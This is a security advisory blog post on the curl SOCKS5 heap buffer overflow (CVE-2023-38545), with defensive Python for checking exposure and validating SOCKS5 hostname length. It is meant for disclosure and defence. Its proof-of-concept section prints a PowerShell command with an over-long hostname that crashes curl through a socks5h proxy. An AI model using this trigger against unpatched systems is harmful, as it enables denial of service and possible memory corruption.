October 11, 2023

CVE-2023-38545 (curl heap buffer overflow)

The maintainers of the widely used libcurl library have recently disclosed two vulnerabilities that impact versions 7.69.0 to 8.3.0. One of them is rated high severity and has been described by the maintainers themselves as "probably the worst curl security flaw in a long time." curl is a command-line tool that numerous applications rely on for core functionality, and both the curl tool and the libcurl library are affected by this high-severity vulnerability. Patches have been promptly made available on the official curl website and through the various Linux distributions.

The high-severity vulnerability is a heap-based buffer overflow in the hostname handling of the SOCKS5 handshake, reachable when curl is run with a specific proxy option. It arises because curl switches to a local resolve mode when it encounters an overly long hostname, specifically one longer than 255 bytes. Successful exploitation, however, requires several conditions and prerequisites to be met:

  1. The attacker must have the capability to direct curl towards a server under their control.
  2. Curl must be configured to use a SOCKS5 proxy in proxy-resolver mode.
  3. Curl must be set to automatically follow redirects.
  4. In applications using libcurl, an overflow is only possible if CURLOPT_BUFFERSIZE is not set or set to a value smaller than 65541. By default, curl sets CURLOPT_BUFFERSIZE to 100kB, making it non-vulnerable in its default configuration.
  5. The SOCKS5 handshake must be "slow enough" to trigger the local variable bug. The precise meaning of "slow enough" is unspecified, but typical server latency is noted to be likely sufficient to trigger it.

This vulnerability primarily affects applications that rely on curl for SOCKS5 proxy communication, especially when CURLOPT_PROXYTYPE is set to CURLPROXY_SOCKS5_HOSTNAME or when the proxy is configured using a scheme such as socks5h://.

Despite the severity of this vulnerability, several factors mitigate its widespread exploitation. Modern memory protection mechanisms add an additional layer of defense, and attackers must first identify a specific attack surface that exposes curl in a vulnerable manner. As a result, the likelihood of widespread mass exploitation is thought to be low.
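The conditions above translate directly into an exposure check a defender can run over a fleet inventory. The following Python is an added example written for this post, not code from the curl project: it parses the libcurl version out of `curl --version` output, applies the 7.69.0 to 8.3.0 range, and evaluates conditions 2 to 4 (proxy-resolver mode, redirects followed, CURLOPT_BUFFERSIZE unset or below 65541). The inventory records, hostnames and proxy addresses are constructed sample data.

```python
"""Assess exposure to CVE-2023-38545 from version and configuration facts.

Added example for this write-up; it is not code from the curl project.
Thresholds and conditions come from the advisory summary above; the
inventory records at the bottom are constructed sample data.
"""
import re
from typing import Optional, Tuple

AFFECTED_FROM = (7, 69, 0)   # first affected release
AFFECTED_TO = (8, 3, 0)      # last affected release; 8.4.0 carries the fix
MIN_SAFE_BUFFERSIZE = 65541  # CURLOPT_BUFFERSIZE at or above this cannot overflow

_LIBCURL_RE = re.compile(r"libcurl/(\d+)\.(\d+)\.(\d+)")


def parse_libcurl_version(version_output: str) -> Optional[Tuple[int, int, int]]:
    """Pull libcurl's version out of `curl --version` (or any string carrying libcurl/x.y.z)."""
    match = _LIBCURL_RE.search(version_output)
    if not match:
        return None
    major, minor, patch = (int(g) for g in match.groups())
    return (major, minor, patch)


def version_affected(version: Tuple[int, int, int]) -> bool:
    """True for 7.69.0 through 8.3.0 inclusive."""
    return AFFECTED_FROM <= tuple(version) <= AFFECTED_TO


def uses_proxy_resolver(proxy: Optional[str], proxytype: Optional[str]) -> bool:
    """Condition 2: the proxy is asked to resolve hostnames, either via a
    socks5h:// proxy URL or CURLOPT_PROXYTYPE = CURLPROXY_SOCKS5_HOSTNAME."""
    if proxy is not None and proxy.lower().startswith("socks5h://"):
        return True
    return proxytype == "CURLPROXY_SOCKS5_HOSTNAME"


def config_exploitable(proxy, follow_redirects, buffersize, proxytype=None) -> bool:
    """Conditions 2 to 4: proxy-resolver mode, redirects followed, and a
    download buffer below 65541 bytes (an unset CURLOPT_BUFFERSIZE counts as small)."""
    if not uses_proxy_resolver(proxy, proxytype):
        return False
    if not follow_redirects:
        return False
    return buffersize is None or buffersize < MIN_SAFE_BUFFERSIZE


def assess(record: dict) -> str:
    """Combine version and configuration into one verdict for an inventory record."""
    version = parse_libcurl_version(record.get("version_output", ""))
    if version is None:
        return "unknown-version"
    if not version_affected(version):
        return "unaffected-version"
    if config_exploitable(record.get("proxy"), record.get("follow_redirects", False),
                          record.get("buffersize"), record.get("proxytype")):
        return "exposed"
    return "affected-version-config-not-exploitable"


# Constructed sample inventory (host names, proxies and versions are made up).
SAMPLE_INVENTORY = [
    {"host": "app-01", "version_output": "curl 8.1.2 (x86_64-pc-linux-gnu) libcurl/8.1.2 OpenSSL/3.0.2",
     "proxy": "socks5h://10.0.0.5:1080", "follow_redirects": True, "buffersize": None},
    {"host": "app-02", "version_output": "curl 8.1.2 (x86_64-pc-linux-gnu) libcurl/8.1.2 OpenSSL/3.0.2",
     "proxy": "socks5h://10.0.0.5:1080", "follow_redirects": True, "buffersize": 102400},
    {"host": "app-03", "version_output": "curl 8.4.0 (x86_64-pc-linux-gnu) libcurl/8.4.0 OpenSSL/3.0.2",
     "proxy": "socks5h://10.0.0.5:1080", "follow_redirects": True, "buffersize": None},
    {"host": "app-04", "version_output": "curl 7.88.1 (x86_64-pc-linux-gnu) libcurl/7.88.1 OpenSSL/3.0.2",
     "proxy": "socks5://10.0.0.5:1080", "follow_redirects": True, "buffersize": None},
]


def assess_inventory(inventory) -> dict:
    """Map each host to its verdict."""
    return {rec["host"]: assess(rec) for rec in inventory}


if __name__ == "__main__":
    for host, verdict in assess_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
```

Only app-01 comes back "exposed": app-02 has the 100 kB buffer the curl tool uses by default, app-03 already runs the fixed release, and app-04 uses plain socks5:// where curl resolves locally and never sends the hostname to the proxy. Patching is still the right answer for every affected version; the configuration verdict only helps prioritise.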

Proof of Concept:

PS > $payload = 'A' * 10000
PS > curl.exe -v -x socks5h://127.0.0.1:9050 $payload

* Trying ::1:9050...
* connect to ::1 port 9050 failed: Connection refused
* Trying 127.0.0.1:9050...
* SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=10000]
* SOCKS5 connect to
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA...
* Send failure: Bad file descriptor
* Failed to send SOCKS5 connect request.
Segmentation fault (core dumped)
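The line "SOCKS5: server resolving disabled for hostnames of length > 255" in the output above is the point where curl switched resolver mode. The 255 limit is not arbitrary: in a SOCKS5 CONNECT request (RFC 1928) a domain-name destination (ATYP 0x03) is preceded by a single length byte, so a longer name cannot be handed to the proxy at all. The correct handling of such a name is to refuse the connection rather than silently change behaviour. The following Python is an added example for this post, not curl code; it encodes and decodes that request and applies the length check up front.

```python
"""Encode a SOCKS5 CONNECT request (RFC 1928) for a domain-name destination.

Added example for this write-up, not curl code. With ATYP 0x03 the domain
name follows a single length byte, which is where the 255-byte limit comes
from. A hostname that does not fit is rejected instead of being truncated or
resolved some other way.
"""
import struct

SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01
ATYP_DOMAINNAME = 0x03
MAX_DOMAIN_LEN = 0xFF  # one-byte length prefix


def socks5_connect_request(hostname: str, port: int) -> bytes:
    """Build VER CMD RSV ATYP LEN NAME PORT for a domain-name target.

    Raises ValueError when the hostname or port is not representable."""
    name = hostname.encode("ascii")
    if not 1 <= len(name) <= MAX_DOMAIN_LEN:
        raise ValueError(f"hostname length {len(name)} not representable in SOCKS5 (1..{MAX_DOMAIN_LEN})")
    if not 0 <= port <= 0xFFFF:
        raise ValueError("port out of range")
    header = struct.pack("!BBBBB", SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_DOMAINNAME, len(name))
    return header + name + struct.pack("!H", port)


def parse_socks5_connect_request(data: bytes):
    """Decode a request built above and return (hostname, port).

    Rejects messages whose length byte disagrees with the actual size."""
    if len(data) < 5 or data[0] != SOCKS_VERSION or data[1] != CMD_CONNECT or data[3] != ATYP_DOMAINNAME:
        raise ValueError("not a SOCKS5 domain-name CONNECT request")
    name_len = data[4]
    if len(data) != 5 + name_len + 2:
        raise ValueError("length field disagrees with message size")
    name = data[5:5 + name_len].decode("ascii")
    (port,) = struct.unpack("!H", data[5 + name_len:])
    return name, port


def hostname_fits_socks5(hostname: str) -> bool:
    """The up-front check a SOCKS5 handshake should apply before touching any buffer."""
    try:
        socks5_connect_request(hostname, 80)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(socks5_connect_request("example.com", 443).hex())
    print(hostname_fits_socks5("A" * 255), hostname_fits_socks5("A" * 10000))
```

A 10000-byte name such as the one in the proof of concept fails the check immediately; the fixed curl release takes the same approach and treats an over-long hostname in proxy-resolver mode as an error.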

Validating protection against vulnerability exploitation is important. When it comes to security testing and control validation, our belief is that testing should be done at scale, in production environments, continuously. To learn more about production-scale continuous security testing, check out our white paper: An Argument for CST.

References:

https://curl.se/docs/CVE-2023-38545.html
https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/
https://github.com/curl/curl/commit/fb4415d8aee6c1
https://gist.github.com/xen0bit/0dccb11605abbeb6021963e2b1a811d3?permalink_comment_id=4721278
https://twitter.com/_JohnHammond/status/1711913166165463220
